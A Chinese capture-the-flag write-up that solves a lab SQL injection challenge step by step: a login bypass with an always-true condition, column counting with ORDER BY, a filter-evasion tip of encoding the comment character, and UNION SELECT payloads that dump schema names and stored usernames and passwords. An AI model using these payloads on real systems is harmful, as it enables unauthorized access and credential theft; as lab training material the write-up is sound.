一、题目简介:
二、通关思路:
1、首先查看页面源代码:
我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。
2、
打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。
username: 1' or 1=1 #
password: 随便写任意值提交submit,发现可以登录:
并在 Your password 处发现一段乱码,疑似为flag,提交发现错误,这并不是flag,说明flag在别处。
3、通过万能密码已知,注入类型为 字符型,闭合方式为 单引号闭合,尝试查看字段数量。
当 order by 3 时,页面显示如图:
当 order by 4 时,页面显示如图:
Unknown column 4,说明页面报错了,说明字段数为3。
注:这里#使用URL编码格式:% + 十六进制数,目的是防止被过滤,在本题目中若使用 # 或 --+是无法检测出字段数量的,所以在以后的sql注入题目中,最好使用%23。
4、查看回显:
1' union select 1,2,3 %23
5、发现回显位 ,开始注出数据库库名,表名,列明,最终拿到flag。
注出库名:
1' union select 1,2,database() %23 
注出表名:
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) %23
注出列名:
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') %23 
拿到flag:
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23 
成功拿到flag,通关。
